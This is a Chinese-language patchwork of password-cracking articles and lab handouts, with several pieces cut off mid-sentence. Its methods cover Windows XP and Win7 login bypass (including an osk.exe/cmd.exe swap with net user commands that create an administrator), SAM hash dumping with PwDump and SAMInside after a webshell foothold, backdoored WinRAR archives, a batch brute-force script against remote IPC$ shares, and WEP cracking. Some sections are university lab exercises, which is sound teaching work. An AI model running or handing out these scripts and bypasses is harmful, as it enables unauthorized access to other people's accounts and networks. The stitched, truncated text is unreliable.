有关WINDOWS XP登录密码的几种方法 网上关于破解WINDOWS XP登录密码的几种方法很多，但许多根本不行。我现在总结自己试过几种，这几种方法其实均比较菜的，但可行的。WINDOWS XP登录是由SAM 文件管理的，总体来说“山姆大叔”是比较难搞定的，所以网上许多方法不行的原因吧。上次在网上看到关于一篇关于SAM 文件的文章，写得不错，但没能收藏起来。反正有不少人在研究这个。我想就是有了破解的方法，高手们也不一定全公布吧，这是由于大家不难知道的原因——安全，他们不便公布！如果很轻易就破了的话，那微软一定要打这个补丁的，那他们的成果很快就没用了哦。好了下面就说几种方法吧。 一、利用“administrator”(此方法适用于管理员用户名不是“administrator”的情况！) 我们知道在安装Windows XP过程中，首先是以“administrator”默认登录，然后会要求创建一个新账户，以进入WindowsXP时使用此新建账户登录，而且在WindowsXP的登录界面中也只会出现创建的这个用户账号，不会出现“administrator”，但实际上该“administrator”账号还是存在的，并且密码为空。 当我们了解了这一点以后，假如忘记了登录密码的话，在登录界面上，按住Ctrl+Alt 键，再按住Del键二次，即可出现经典的登录画面，此时在用户名处键入“administrator”，密码为空进入，然后再修改“zhangbp”的口令即可。 二、利用GHOST Windows XP安装光盘 现在几乎所有的GHOST Windows XP安装光盘的启动菜单中都有清除WINDOWS XP登录密码这一项，你用该光盘启动电脑后，选择此菜单，以后按照屏幕上的

winrar密码破解原理

第一步：用winhex将下面数据生成rar格式的文件。 526172211A0700CF907300000D0000000000000056947424965E006000000049000000 02E3B1696DEE413D3B1D33310020000000C3EBC6C6B2E2CAD44279CCECD2D76C 6F76652E74787400796AD234784B6DD58B0A427929591366006C6F7665002E747874 2E2E5B7A2D7B7D2E2E39423843569449C8691BEC768E16663C5F9ED737AE6CDDC 6178C0837F6BB88DAA8356B02A700C776FC0F1091C1D16712FC075A011D5B5DEF7 E46966E8B878B80DABCDF9683C49165FFB993A77CDE8600A1262200F3D3D5315D F0FC4E2B3ACAA3943F142EC43D7B00400700 第二步：在winhex中取65h-71h一段数据ctrl+c后粘贴到密码输入框点确定完成秒破。（实例一） 实例二 526172211A0700CE997380000D00000000000000395B7A2D7B7D2E2ED417190FDC9 9688612D2B31773CD93FE082F30D3229C8F77F51B936AD003E65AADF605471FA4E D0E3655748BCC8F5FA5BFDE4651275A2AA306CB7999C579C249C5AF56A0D3744B D7A695586FEF9FB1AB146CA80DED886936DE3AB003EC44215BA8497E4C1A974D4 5810C8F1277726881548FBAB842BCF9E17B815C116260ADFEB9151DF97C6F93A67 3629691B767F883950018B7DE7C0D86FFF04A10905E32BD1DB015B709A298DB8D2 C42DF23A131F2AD999AA3BB2316F031C5115c179a2f877a41393761683939 选中14h-1bh一段数据ctrl+c后粘贴到密码输入框中后面再加上dch-e3h处的ASCII字符，确定后即秒破了！信不信由你！ RAR加密的原理，是将UNICODE格式的密码，与随机生成的一个8字节的SALT连在一起，根据它生成AES算法的密钥来进行加密。 而加密后的RAR中，除了加密后的原压缩内容之外，文件头结构还保存了这个SALT值用于解密。 原则上SALT的生成过程跟用户输入时的密码一点关系都没有，因此它本来不保存关于密码的显式信息，但是我们可以对WINRAR程序进行patch，使SALT跟密码发生直接联系，从而使这个SALT成为潜在的“后门”。 由于SALT只有8个字节，所以对于8个字节以内的密码，可以直接保存在SALT中（或者简单的XOR一下或其他，反正可以用很容易的可逆的算法处理）。 那么密码超出8字节怎么办？这里楼主分为两种方式处理，分别是实例一和实例二。 实例一应该是利用了把文件头的HEAD_SIZE字段改大，这样文件头多出来的地方（WINRAR读取文件头时是跳过这部分的）就可以保存密码8字节以后的内容。实例一中的65h-6ch内容就是SALT，而6dh-71h就属于把HEAD_SIZE改大之后多出来的部分了。 但是实例一这种方法应用的前提是文件头没加密。如果文件头被加密（这时MAIN_HEAD 的HEAD_FLAGS包含0x0080），那么MAIN_HEAD后面紧跟着的就是SALT（实例二的14h-1bh内容），SALT后面则是被加密的所有内容（包括文件头）。那么怎么把密码8字节以后部分搞进去？实例二的做法，我猜是因为加密过程是16字节为一组，加密后的内容也应该是16字节的倍数，所以解密时也以16字节为单位读取，当文件内容最后跟着一段小于16字节的数据时，WINRAR解密时直接无视这段数据。于是就可以把密码的后半部分放在文件最后（但是不能超过16字节），这样用这种方法可以保存不超过23字节的密码。

Windows系统口令破解实验

实验名称: Windows系统口令破解实验 实验要求： [实验目的] ◆了解Windows 2000系统密码的加密原理。 ◆了解Windows 2000系统密码的脆弱性。 ◆学会使用常见的密码破解工具。 [实验环境] ◆本地计算机 ◇操作系统：Windows 2000主机 ◇软件：SAMInside 2.2.5。 [实验内容] ◆从SAM文件导入密码散列破解。 ◆字典模式破解。 ◆暴力模式破解。 ◆检测本地计算机的密码脆弱性。 实验指导： ? 运行实验工具目录下的SAMInside.exe。 ? 点击工具栏中按钮右侧的下拉箭头，选择"Imort PWDUMP-file..."。

? 在"Import PWDUMP-file"文件打开对话框中，选择实验工具目录下的文件 "Pwdump_SAM.txt"，点击"打开"按钮返回主界面。 （"Pwdump_SAM.txt"是事先用pwdump工具从目标服务器上导出的sam文件，采用pwdump自定义的格式。） ? 马上即可查看到自动破解出来的用户弱密码。请将这时查看到的用户名和所对应的密码写入实验报告中，统一采用username:password的格式。 ? 在"Username"栏中仅选择如图所示的用户。 ? 点击工具栏中按钮右侧的下拉箭头，选择"Dictionary attack"。

? 再次点击工具栏中按钮右侧的下拉箭头，选择"Options..."。 ? 在弹出的"Dictionary attack settings"对话框中，点击"Add..."按钮添加一个密钥猜解字典，这里选用实验工具目录下的"single.dic"。 ? 回到"Dictionary attack settings"对话框，在"Additionally check"组合框中选中"Reversed words"选项。点击"OK"按钮回到主界面。

L001001004-口令破解-04windows口令破解Saminside

课程编写 内容 名称口令破解-04windows口令破解Saminside 要求1、了解windows口令破解的原理 2、熟练使用windows口令破解工具 虚拟PC）操作系统类型：windows 2003；网络接口：本地连接连接要求PC 网络接口，本地连接与实验网络直连 描述1、学生机要求安装java环境 2、vpc安装windows 2003 环境描述1、学生机与实验室网络直连; 2、PC1与实验室网络直连; 3、学生机与VPC1物理链路连通； 识使用Saminside获取系统密码 在通过SQL注入等方式获取网站的Webshell后，就需要利用系统各种漏洞进行提权，提权成功后通过此时为了长期控制或者进一步渗透网络，就需要获取系统正常用户的密码。获取系统密码哈希值的软中主要介绍如何通过Saminside来获取系统的Hash以及结合彩虹表快速破解操作系统用户密码。 使用Saminside 官方提供的是试用版本，有一些高级功能不能使用，但并不影响获取系统密码哈希值，Saminside可2008 Server以下操作系统的用户密码哈希值，在获取这些哈希值后可以通过彩虹表或者字典等来进系统的密码。Saminside不需要安装，将下载的Saminside.zip解压缩到本地磁盘即可使用。 SAM文件位于系统根目录下 c:\WINDOWS\system32\config，可以加载其它系统、DOS（NTFS分区需启动Windows PE、Bart's PE下启动，但是，如果系统密码经过Syskey双重加密，就不能直接用LC5直要用PWDUMP获取。 如何在Windows系统下复制SAM文件呢？ 第一种:使用WinHex这款软件,进入磁盘编辑，然后进入%windir%\system32\config下复制SAM和S 可. 第二种:使用冰刃,直接用冰刃复制c:\windows\system32\config下SAM和SYSTEM到任意目录即可.经测试以上两种方法都需要系统管理员权限，第二种方法不能在Windows7系统下操作，前者在Win 注意：复制SAM的同时还要复制SYSTEM这个文件。 容1.使用gethash工具获取sam表值 2.使用saminside工具破解sam表中

教你9招 破解多种系统登陆密码方法

如果你是一个很容易遗忘的人，那么一定不要忘记在第一次设置密码的同时创建一张可以恢复Windows XP中的账户密码的启动盘，它可以让你免去格式化硬盘的烦恼。 从“控制面板”中找到“用户账户”项，选中自己的账户进入如图所示的控制界面，我们可以看到左侧任务列表中有一项“阻止一个已忘记的密码”，点击后便可打开“忘记密码向导”，向导会提示插入一张格式化过的空白磁盘，操作过程中会让你输入该账户所使用的密码，很快便可以创建一张密码重设盘。 以后，当我们忘记了账户密码的时候，在没有使用“欢迎屏幕”登录方式的情况下登录到Windows XP后，按下“Ctrl + Alt + Del”组合键，出现“Windows 安全”窗口，点击选项中“更改密码”按钮，出现更改密码窗口。这个窗口中，将当前用户的密码备份，点击左下角“备份”按钮，激活“忘记密码向导”，按照提示创建密码重设盘。 如果在Windows XP的登录窗口输入了错误的密码，就会弹出“登录失败”窗口，如果你的确想不起来自己的密码是什么时，可点击“重设”按钮，启动密码重设向导，通过刚才所创建的密码重设盘，就可以用这张密码重设盘更改密码并启动系统。重新设定密码，登录Windows XP。 “密码重设盘”的创建，含有一定的危险性，因为任何人都可以使用这一张“密码重设盘”来登录Windows XP，都可以以该用户的名义进入用户帐户，操作真正用户所能操作的一切，所以必须将“密码重设盘”保存在适当的地方，以防丢失或失泄密。 方法1——利用“administrator”(此方法适用于管理员用户名不是“administrator”的情况) 我们知道在安装Windows XP过程中，首先是以“administrator”默认登录，然后会要求创建一个新账户，以进入Windows XP时使用此新建账户登录，而且在Windows XP的登录界面中也只会出现创建的这个用户账号，不会出现“administrator”，但实际上该“administrator”账号还是存在的，并且密码为空。 当我们了解了这一点以后，假如忘记了登录密码的话，在登录界面上，按住Ctrl+Alt 键，再按住Del键二次，即可出现经典的登录画面，此时在用户名处键入“administrator”，密码为空进入，然后再修改“zhangbp”的口令即可。 方法2——删除SAM文件(注意，此法只适用于WIN2000) Windows NT/2000/XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager , SAM)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识完全不同。因此，一旦某个帐号被用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。安全帐号管理器的具体表现就是%SystemRoot%system32configsam文件。SAM文件是Windows NT/2000/XP 的用户帐户数据库，所有用户的登录名以及口令等相关信息都会保存在这个文件中。 知道了这些，我们的解决办法也产生了:删除SAM文件，启动系统，它会重建一个干净

破解WIN7管理员密码

破解WIN7管理员密码 在PE下按照以下步骤操作 1、打开“我的电脑”在你win7系统所在盘位置，我这里是C盘。然后，找C：\windows\system32下的“osk.exe”我们要把这个程序剪切到其它文件夹处，不过，直接操作是不能成功了，这里，我们要先对它的权限设置下选中“osk.exe”,右键-安全-高级选项-所有者，选择“Administrator(lsasetupDomin|Adminstrator”确定，然后勾选完全控制。取得修改权限后，把“osk.exe”剪切到其它文件夹里，注意，一会进入win7后，别忘记还原到原位置呀。 2、再找到cmd.exe ,修改权限，方法同上。取得权限后，修改其名字为“osk.exe”。 3、重启系统，进入win7登录界面，鼠标点击左下角的辅助工具勾选，“不使用键盘输入（使用屏幕键盘）”这时，会进入cmd命令行窗口,进入命令提示符窗口后 1）.如果你的当前要登陆帐户（或者忘记密码帐户）是英文字母时，运行下面的命令“net user xxx ***”(其中“xxx”为用户名东度免费资源网，”***“为要修改为的密码)，我输入的是net userzxq123456( 即把，我当前的帐户zxq的密码强行修改为“123456” 2）.如果你的帐户为中文，可能无法在命令提示符下输入,这里我们创建一个新的帐户，这里，我建的用户名为“zxq”密码为123456输入命令“net user zxq 123456 /add ”，下面继续输入命令，把zxq这个用户提升为管理员net localgroup administrators zxq /add,命令成功结束，这时登录界面会多出一个名为“zxq”的帐户，进去后就可以进入控制面板，用户帐户里修改你之前的帐户的密码了哦， 4、进入系统后，别忘记把那个改过名后的osk.exe改为cmd.exe然后，把之前那个osk.exe 还放回system32下。

【精选资料】1分钟破解Windows系统开机密码

1分钟破解Windows系统开机密码 Windows系统开机密码从Windows 98开始就被人津津乐道，最早的密码保护可以用形同虚设来形容。直到后来的Windows 2000输入法漏洞，微软才意识到问题的严重性，而面对使用范围非常广泛的Windows XP 系统来说，密码的安全性又如何呢？如何在没有正确口令的情况下修改或者突破系统验证呢？ 一、光盘破解系统密码 网络上搜索“破解XP密码”会看到很多信息，其中大部分据称可破解Windows XP操作系统密码的方法却不具有普遍性，只能解决个别版本操作系统的密码问题；有的甚至根本无法实现。而利用“ERD COMMANDER”便可以成功破解Windows XP/2003操作系统密码，正好给解决密码问题，效果绝对一级棒！由于这款工具的原型是系统维护，所以我们只是利用其中一个很小的组件。但仍然需要准备一张空白光盘。 程序默认只是一个ISO镜像文件。利用“Nero”等光盘刻录软件将该镜像文件刻录至光盘上。而后在电脑的BIOS中将计算机的启动顺序设为光驱优先。 用该光盘引导启动计算机。在启动时我们会发现其启动界面与Windows XP非常相像。当启动完成后即可进入到ERD COMMANDER的设置界面，若是用户此时装有两个或多个操作系统，选择需要破解密码的系统。当选择完成后指定系统的键盘布局和时区，单击“确定”按钮完成设置。 此时进入到“ERD COMMANDER”桌面，依次打开系统主菜单“开始”→“管理工具”→“密码修改”，进入密码设置向导对话框。在该对话框中单击“NEXT”按钮，就可以进入到密码设置页面了。选择打算设置密码的帐户，分别在“新密码”、“密码确认”栏目输入相同的密码，最后单击“NEXT”按钮就可以成功更改Windows XP 中的帐户密码了。

口令破解实验

华北电力大学 实验报告| | 实验名称网络攻击与防范实验 课程名称口令破解实验 | | 专业班级：学生姓名： 学号：成绩： 指导教师：实验日期：

口令破解实验 一、实验目的与要求 1、了解Windows 系统密码的结构及构造原理。 2、了解Windows 系统密码文件（SAM 文件）的相关知识。 3、掌握获取Windows 用户密码的方法。 4、创建三组用户名和密码（复杂各不相同），采用不同模式破解，给出详细步骤及结果。 二、实验环境 1、VPC1(虚拟PC）：操作系统类型：windows xp；网络接口：eth0。 2、VPC1连接要求：与实验网络相连。 3、软件描述：PwDump7.exe，SAMInside.exe，John The Ripper.exe。 三、实验内容 1、在Windows系统下用SAIMnside和PwDump破解本地用户登录口令。 2、在Windows系统下用John The Ripper和PwDump破解本地用户登录口令。 四、实验正文 （一）在Windows系统下用SAIMnside和PwDump破解本地用户登录口令 1、使用pwdump 等工具获取 Windows 系统密码 Hash 值。 2、使用SAMInside工具对 Windows 系统密码进行破解。 Pwdump的使用语法为： pwdump [-h][-o][-u][-p][-n] machineName 其中： machineName——目标计算机名称。 -h——显示本程序的用法。 -o——指定导出后的口令散列值的存储文件。 -u——指定用于连接目标的用户名。 -p——指定用于连接目标的口令。 -s——指定连接上使用的共享，而不是搜索共享。 -n——跳过口令历史。

穷举法破解远程登录windows系统的密码

穷举法破解远程登录windows系统的密码 一、首先用工具生成字典文件，笔者用的是《黑刀超级字典生成器》。记录好文件的绝对路径。 二、与远程主机建立连接,然后DOS命令得用字典里的密码登录： 1、字典：for /f %i in (字典文件) do net use \\主机ip\ipc$ "%i" /user:"用户名" 2、数字：for /l %i in (start,step,end) do net use \\主机ip\ipc$ "%i" /user:"用户名" 这样只是登录了,但要想知道密码的话如下方法: 将下面文件存为pass.bat: @echo off date /t >>c:\pass.txt echo 破解结果：>>c:\pass.txt if "%6"=="1" goto shit2 :shit1 start "正在破解" /min cmd /c for /f %%i in (%1) do call execute.bat %2 "%%i" %3 goto quit :shit2 start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call execute.bat %4 "%%i" %5 :quit 将下面文件存为execute.bat: net use \\%1\ipc$ %2 /user:"%3" goto answer%ERRORLEVEL% rem %ERRORLEVEL%表示取前一命令执行返回结果，net use成功返回0，失败返回1 :answer0 echo 远程主机："%1" >>c:\pass.txt echo 用户："%3" >>c:\pass.txt echo 密码：%2 >>c:\pass.txt net use \\%1\ipc$ /delet exit :answer1 将pass.bat与execute.bat存放于system32中，用法如下： 1、如果用字典破：pass.bat 字典文件路径及名称主机用户名 2、如果用数字破：pass.bat 起始数步长结束数主机用户名1

在Windows下破解无线WEP密码详解(带图)+个人经验

先啰嗦几句: 这个在WIN下破解,用的是WinAircrack.exe这个软件。 原理是这样:先在网卡上装驱动(不是网卡自带的厂家的驱动,而是监听软件(airodump.exe)和网卡之间联系的驱动),然后运行监听软件(airodump.exe),来监听正常连接的客户和AP之间的通讯,产生一个文件,就是监听结果的包,然后等这个文件包监听的数据量够大了,再用WinAircrack.exe这个软件来分析这个文件包,得到密码. 但是,如果AP和正常连接的客户网卡之间通讯很少,那么要用监听软件(airodump.exe)获得足够的通讯包,是很困难的,所以这篇文章只是交流用,有兴趣的可以继续读下去,我试验过了,能成功!在监听中,我用正常连接的客户不断下电影,监听软件(airodump.exe)还是能够能很快监听到足够的通讯数据的,进而就破解了我的AP的密码.现在我还是使用的BT3来破解,应为它不仅能监听,而且当AP和合法客户端通讯小的时候,可以发送攻击,命令,使得能快速监听到足够的通讯数据,进而破解. 这是准备,主要是看懂怎么重新装驱动 一、破解难点： 在介绍破解操作前，我们先要了解下一般用户是通过什么样的手法来提高自己无线网络的安全性的。 （1）修改SSID号： 进入无线设备管理界面，将默认的厂商SSID号进行修改，这样其他用户就无法通过猜测这个默认厂商SSID号来连接无线网络了。 （2）取消SSID广播功能： 默认情况下无线设备在开启无线功能时都是将自己的SSID号以广播的形式发送到空间中，那么在有信号的区域中，任何一款无线网卡都可以通过扫描的方式来找到这个SSID号。这就有点象以前我们使用